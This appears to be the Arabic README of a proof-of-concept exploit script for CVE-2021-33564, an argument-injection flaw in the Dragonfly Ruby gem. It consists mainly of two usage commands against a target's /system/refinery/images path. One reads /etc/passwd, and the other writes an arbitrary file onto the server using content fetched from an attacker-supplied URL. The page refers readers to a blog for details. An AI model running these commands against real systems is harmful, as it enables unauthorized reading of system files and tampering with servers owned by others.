
حقن الوسائط في جوهرة روبي Dragonfly
سكريبت استغلال للثغرة CVE-2021-33564 (حقن وسائط في جوهرة Dragonfly Ruby).
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
لمزيد من المعلومات، يُرجى زيارة المدونة.